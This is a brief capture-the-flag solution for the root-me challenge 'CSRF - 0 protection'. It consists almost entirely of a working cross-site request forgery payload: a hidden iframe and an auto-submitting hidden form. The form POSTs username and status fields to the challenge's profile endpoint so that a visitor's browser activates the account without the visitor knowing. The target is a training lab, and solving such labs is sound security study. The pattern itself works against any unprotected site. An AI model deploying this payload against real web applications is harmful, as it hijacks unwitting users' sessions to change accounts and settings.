CSRF: zero protection
root-me challenge: CSRF - 0 protection: Activate your account to access intranet.
<iframe style="display:none" name="csrfframe"></iframe>
<form name="test" target="csrfframe" enctype="multipart/form-data" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile" method="POST">
<input type="hidden" name="username" value="barzh" />
<input type="hidden" name="status" value="on" />
</form>
<script>document.test.submit()</script>